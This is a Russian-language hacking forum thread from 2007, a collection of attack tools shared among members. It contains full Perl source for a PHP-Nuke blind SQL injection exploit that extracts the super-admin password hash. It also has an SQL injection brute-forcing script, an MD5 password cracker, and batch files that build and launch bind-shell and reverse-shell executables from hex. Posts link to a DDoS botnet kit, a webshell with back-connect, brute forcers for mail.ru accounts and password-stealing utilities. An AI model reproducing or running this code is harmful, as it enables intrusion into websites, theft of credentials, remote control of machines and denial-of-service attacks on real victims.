* Other command line parameters to get database banner, enumerate databases, tables, columns, dump values, retrieve an arbitrary file content and provide own SQL expression to query remote database;
* Debug output messages in verbose mode execution;
* PHP setting magic_quotes_gpc evasion by encoding every query string, between single quotes, with CHAR (or similar) database function.
http://www.databasesecurity.com/dbsec/sqlmap-0.3.tar.gz
Автор: Creeping Death 18.02.2007, 11:38
SQL Injection Soft
SQLInjector
http://www.ngssoftware.com/
Bobcat
http://www.northern-monkee.co.uk/projects/bobcat/bin/BobCat_Alphav0.1.zip
Automagic
http://www.databasesecurity.com/dbsec/automagic.zip
HacmeBank
http://www.databasesecurity.com/dbsec/Hacme_Bank_Setupv2.15.zip
Absinthe
http://www.0x90.org/releases/absinthe/
Typhon III
http://www.ngssoftware.com/
Автор: ~NeoN~ 7.03.2007, 18:17
смотрим куки:
IECookiesView
Protected Storage PassView
Автор: Creeping Death 11.03.2007, 16:44
MD5CRACK
CODE
#!/usr/bin/perl
# use strict; Sorry next time i'll use it;)
# MD5 Hash Bruteforce Kit
# by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!
$ver = "01";
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);
if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}
if ($ARGV[0]=~"x") {
$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}
if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};
print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";
for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}
sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";
print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";
}
sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}
$Start = gettimeofday();
do{
for (my $i =0;$i<$CharSet;$i++){
if ($RawString[$i] > length($alpha)-1){
if ($i==$CharSet-1){
print "Bruteforcing done with $CharSet Chars. No Results.\n";
$cnt=0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
###################################################
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}
print "$ARGV[3] != $hash ($ret)\n";
if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}
###################################################
#checkhash($CharSet)."\n";
$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}
sub checkhash{
$CharSet = shift;
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}
if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}
}
Автор: Creeping Death 25.03.2007, 15:12
PHP-nuke <=8.0 Final
CODE
#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Blind sql injection attack in INSERT syntax
#version for mysql >= 4.0.24, using 'brute force'
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]Time normal query: 2 seconds
#[+]Length user's record: 5
#[+]Length password's record: 32
#[+]Login:
#admin
#[+]Password:
#b481ab90de84a345c665f1e4ef3c2
#[+]Super admin:
#admin:b481ab90de84a345c66585e1f4cf16e4
use strict;
use warnings;
use LWP;
my $offset=4;#It is the most important variable!!
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my
($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,
$hash,$referer,$czy_dziala,$znak);
banner();
$czas_nor=polacz("http://www.krasza.int.pl");
print "[+]Time normal query: $czas_nor seconds\n";
$dlugosc_user=ustal_dlugosc("aid",8);
print "[+]Length user's record: $dlugosc_user\n";
print "[+]Length password's record: 32\n";
print "[+]Login:\n";
$user=brute_force_aid($dlugosc_user);
print "[+]Password:\n";
$hash=brute_force_pass(32);
print "[+]Super admin:\n";
print "$user:$hash\n";
##
sub brute_force_pass{
my ($dlugosc)=@_;
my ($i,$j,$referer,$wynik,$dolny_zakres);
for($i=1;$i<=$dlugosc;$i++){
for($j=48;$j<=122;$j++){
$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.",
1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$znak=chr($j);
print "$znak";
$wynik.=$znak;
if($i<$dlugosc){
$i+=1;
$j=47;
}else{
last;
}
}
#przeskok-optymalizacja;]
if($j==57){
$j=96;
}
}
}
print "\n";
return $wynik;
}
sub brute_force_aid{
my ($dlugosc)=@_;
my ($i,$j,$referer,$wynik,$dolny_zakres);
for($i=1;$i<=$dlugosc;$i++){
for($j=48;$j<=122;$j++){
$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((ASCII(SUBSTRING(`aid`,".$i.",
1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$znak=chr($j);
print "$znak";
$wynik.=$znak;
if($i<$dlugosc){
$i+=1;
$j=47;
}else{
last;
}
}
if($j==57){
$j=64;
}
if($j==90){
$j=96;
}
}
}
print "\n";
return $wynik;
}
sub ustal_dlugosc{
my ($pole,$len)=@_;
my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba);
$narazie_dziala_liczba=0;
$nie_dziala_liczba=65;
#for($len=1;$len<64;$len++){
while($len<=64){
if($narazie_dziala_liczba==$len ||
$nie_dziala_liczba<=$len){
return $narazie_dziala_liczba;
}
$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((LENGTH(`".$pole."`)>".
$len.")
& 1, benchmark(50000000,CHAR(0)),0) FROM
`nuke_authors` WHERE `radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$narazie_dziala_liczba=$len+1;
$len+=2;
}else{
$nie_dziala_liczba=$len+1;
$len-=1;
}
}
print "[-]Exploit Failed\n";
exit;
}
sub czy_dziala{
my ($refik)=@_;
my $czas_zapytania;
$czas_zapytania=polacz($refik);
if($czas_zapytania>$czas_nor+$offset){
return 1;
}else{
return 0;
}
}
sub polacz{
my ($referrer)=@_;
my ($czas,$czas_poczatek,$czas_koniec);
$zadanie->referer($referrer);
$czas_poczatek=time();
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
$czas_koniec=time();
$czas=$czas_koniec-$czas_poczatek;
return $czas;
}
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Blind sql injection attack in INSERT syntax\n";
print "version mysql >= 4.0.24, using 'brute force'\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Blind sql injection attack in INSERT syntax\n";
print "version mysql >= 4.0.24, using 'brute force'\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl http://\n";%20%20%20%20%20%20%20%20print%20"\t%5burl%5d-vicitim%20webpage%20with%20index.php\n";%20%20%20%20%20%20%20%20print%20"Example:\n";%20%20%20%20%20%20%20%20print%20"\tperl%20bruteforce.pl%20%5burl=
exit(0);
}
Автор: Creeping Death 25.03.2007, 21:29
ВНИМАНИЕ!
в данной разрешены посты, с просьбой о нахождении той или иной программы, НО:
1)должно быть четко и "по-русски" описано, что конкретно надо
2)под какую платформу программа нужна.
после выполнения заявки, одним из форумчан, посты с просьбами будут удаляться.
заявки по развитию, улучшению данной темы, пожалуйста, в ПМ
Код
Арсенал хакера.
Так и представляются стойки с копьями мечами,манекены с надетыми доспехами.. А в уголках пылятся метательные кинжалы и колчаны.Ведь есть копьё и тыкай ним пока не найдёшь щель в доспехах..Но пока не умер хранитель арсенал никогда не будет пустовать.И все новые и новые последователи хранителя приносят снаряжение и бережно раскладывают его по полкам уходящим в непроглядный мрак Сети. (c)bdrFsg
Автор: Creeping Death 26.03.2007, 16:08
Blueprint (V. 0.1-3) - a perl tool to identify Bluetooth devices
This version recognizes about 53 different devices.
http://trifinite.org/Downloads/bp_v01-3.zip
Автор: is) 27.03.2007, 21:52
UDC
программа, созданная для быстрого восстановления пароля по хэш-значению для различных алгоритмов хэширования (более 40: MD5, NTLM, DES, MD4, SHA...).
* Обычному пользователю она поможет при восстановлении забытых паролей (например, подбор пароля в Windows), благодаря поддержке уникального мгновенного режима восстановления пароля, по похожей на него строке.
* Организации могут восстанавливать пароли к неограниченному числу пользователей одновременно, практически без потери скорости; при помощи UDC, администрация форума может за пару секунд выявить все "слабые" пароли в системе.
* Для решения более серьезных переборных задач поможет поддержка многопроцессорных систем и автоматического распределения атаки в реальном времени.
Текущая версия ядра - 2.0.9.2, обновление от 23 марта 2007 (http://the-udc.com/rus/download.html)
Новости, комментарии, помощь и словари вы найдете на нашем форуме (http://the-udc.com/forum/)
Получить полную версию UDC бесплатно! (http://the-udc.com/forum/index.php?topic=33.0)
Автор: Creeping Death 28.03.2007, 20:49
NetBot_Attacker 1.4 English version
By:Security warning team(www.hackeroo.com)Development
Function on :
NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack
He may control the most PC computer to start DDOS to attack!
The main attack type has:
Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link
WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET
Special attack: GAME attack,CIDR attack,Hybrid attack
Auxiliary function::
Download operation,Shutdown unloading,Open URL,All shutdown
Help:You only need to have the FTP space and may use it,
Or you are fixed IP,Or your free application dynamic domain name.
The thanks supports NetBot_Attacker,We also opened the VIP edition.
VIP service of edition end little, EXE WROM, U records of spread, Intranet travel, attack might to be further loud .
安全警戒线(Security warning team) www.hackeroo.com
Buy VIP edition connection MSN:hackeroo#hotmail.com
http://rapidshare.com/files/22099705/NetBot_Attacker_1.4_English.rar.html
Автор: @llexxxei 11.04.2007, 13:58
Вскрываем *.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Gener 22.04.2007, 18:33
Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/
(Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.
Вот прямые линки для скачивания последней версии:
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Gener 25.04.2007, 20:17
Mail.ru Loginer Free
Чекер мыл на сервера mail.ru (и всех поддоменах)
+малый траф (13 мыл примерно 24 кб)
+высокая скорость работы
+работает с парсеными логами
+drag&drop файла в окно программы с распознованием его типа
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
пароль:
mcbobo
Автор: Creeping Death 6.05.2007, 18:32
Cнимаем пароли. небольшой список программ.
Windows Password Recovery Bootdisk 1.0.0.1
http://www.rixler.com/eng/download/bootdisk.zip
Internet Password Recovery Toolbox 1.3.0.2
http://www.rixler.com/eng/download/iprtbox.zip
Internet Explorer Password Recovery Master 1.4.0.4
http://www.rixler.com/eng/download/iepasrec.zip
Outlook Express Password Recovery Master 1.2.0.4
http://www.rixler.com/eng/download/oepasrec.zip
Dial-up Password Recovery Master 1.3.0.6
http://www.rixler.com/eng/download/dpasrec.zip
FTP Password Recovery Master 1.1.0.1
http://www.rixler.com/download/ftpasrec.zip
Instant Messengers Password Recovery Master 1.0.0.4
http://www.rixler.com/download/impasrec.zip
Email Password Recovery Master 1.1.0.1
http://www.rixler.com/download/empasrec.zip
Opera Password Recovery Master 1.0.0.4
http://www.rixler.com/download/oppasrec.zip
Firefox Password Recovery Master 1.0.0.4
http://www.rixler.com/download/ffpasrec.zip
Office Password Recovery Toolbox 1.0.0.4
http://www.rixler.com/download/oprtbox.zip
Office Multi-document Password Cracker 1.0.0.1
http://www.rixler.com/eng/download/mdpascrk.zip
Word Password Recovery Master 1.0.1.1
http://www.rixler.com/eng/download/wpasrec.zip
Excel Password Recovery Master 1.0.0.8
http://www.rixler.com/eng/download/epasrec.zip
Outlook Password Recovery Master 1.0.0.7
http://www.rixler.com/eng/download/opasrec.zip
Access Password Recovery Master 1.0.0.5
http://www.rixler.com/eng/download/apasrec.zip
VBA Password Recovery Master 1.0.0.3
http://www.rixler.com/eng/download/vbpasrec.zip
Zip Password Recovery Master 6.2.0.0
http://www.rixler.com/download/zipprm.exe
Computer Lock Up 1.0.0.4
http://www.rixler.com/eng/download/complock.zip
Автор: Creeping Death 6.05.2007, 18:45
Genom-mail.ru bruter
http://genom.h10.ru/1111.rar
Автор: Creeping Death 8.05.2007, 23:01
Скрипт для проверки на sql-инъекцию, переборо количества столбцов и имен таблиц по словарю.
CODE
#!/usr/bin/perl
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#
#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; #only chars in resolt
my $www = LWP::UserAgent->new;
uss();
if(!$ARGV[0])
{
ans();
while (true)
{
print "\nNew file (^c for quit) ->";
$f=<STDIN>;
$f =~ s/\n//;
enc(); #encode file
burl();
conn();
getres();
}
}
if ($ARGV[0] eq '-b')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute();
}
if ($ARGV[0] eq '-t')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute_table()
}
#=END=MAIN============================================================#
#=======================================================================#
sub brute()
{
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{
$utmp =~ s\26639-1\\g;
print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
exit(0);
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################
sub brute_table()
{
print("--- bruting Colouns ---\r\n");
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{
print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
print("\r\n--- bruting Tables ---\r\n");
open(CATFILE, $ARGV[1]);
while($line=readline(CATFILE))
{
chomp($line);
$sql=substr($utmp,0,length($utmp)-2);
$sql.="+FROM+".$line."/*";
if (chk($sql))
{
$sql =~ s\26639-1\\g;
print "[OK] ".$sql."\r\n";
$all_sql.="[OK] ".$sql."\r\n";
}
else
{
print "[-] No table $line\r\n";
}
$sql="";
}
print("\r\n--- Results ---\r\n");
print $all_sql;
exit;
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################
sub chk()
{
$resp = $www -> get( $_[0] ) or die();
$szz=length($resp->content());
if ($resp->content() =~ /(\d+)26638/) {return($1);}
}
sub ans()
{
exit("bete verion, load_file not correctly working. use -b or -t ");
print "\nAnsver some questions

\r\n";
print "Url for union-> "; $u=<STDIN>;
print "Number of coloums -> "; $n=<STDIN>;
print "Coloum with union -> "; $c=<STDIN>;
$u =~ s/\n//;
$f =~ s/\n//;
}
sub enc()
{
for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
$enc = substr($enc, 0, length ($enc) - 1 );
$f=$enc;
$enc='';
}
sub burl()
{
print "[~] File: $f\n";
$ur = $u; $tmp='';
for ($i=0;$i<$n;$i++)
{
if($i==$c-1)
{
$tmp.="load_file(char($f)),";
}
else
{
$tmp.="0,";
}
}
$tmp = substr($tmp, 0, length ($tmp) - 1 );
$ur.= "+union+select+$tmp/*";
print "[~] url: $ur\n";
}
sub conn ()
{
print "[~] Sending ...\n";
my $resp = $www -> get( $ur );
$cont = $resp -> content();
}
sub getres()
{
$s="_page\">";
$e="</";
$result;
#print $cont;
print "[~] Start: $s \n";
print "[~] End: $e \n";
print "[~] Searching...\n ";
@stringz=split("\n",$cont);
for(@stringz)
{
if(/$e/) { $p = 0; }
$result .= $_."\r\n" if $p;
if(/$s/){ $p = 1; }
}
$result =~ tr/a-zA-Z /a-zA-Z/d;
if($result)
{
print "[+] I found something! \n\n $result";
}
else
{
print "[-] Not found...\n ";
}
$result='';
}
sub uss()
{
print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n";
print '-b for brute colouns'."\n";
print '-t [dictionary_table] for brute tables and colouns'."\n\n";
}
Автор: Creeping Death 9.05.2007, 12:43
GFS-webshell ver 4.0.0.0
Возможности:
1. Удобная навигация по файловой системе жертвы
2. Закачка файлов на сервер жертвы
3. Работа с MySQL
4. Бинд портов и бэкконект
5. Скан портов
6. Брут фтп и MySQL различными способами
http://www.gfs-team.ru/?act=downloads&id=99
FTP-BruteForce ver 1.0
http://www.gfs-team.ru/?act=downloads&id=101
Автор: Creeping Death 9.05.2007, 12:59
Bind.bat , creates a bind shell on port specified
CODE
echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex
echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >>123.hex
echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex
echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >>123.hex
echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >>123.hex
echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca >>123.hex
echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d >>123.hex
echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11 >>123.hex
echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19 >>123.hex
echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >>123.hex
echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe
rem *********CHANGE PORT NUMBER HERE******
bind.exe 8080
deleteit:
del bind.exe
IF EXIST bind.exe GOTO kill
del %0
Reverse.bat , Creates an exe and connects back to specified IP/HOST and PortCODE
echo off && echo n 1.dll >123.hex
echo e 0100 >>123.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >>123.hex
echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex
echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >>123.hex
echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >>123.hex
echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1 >>123.hex
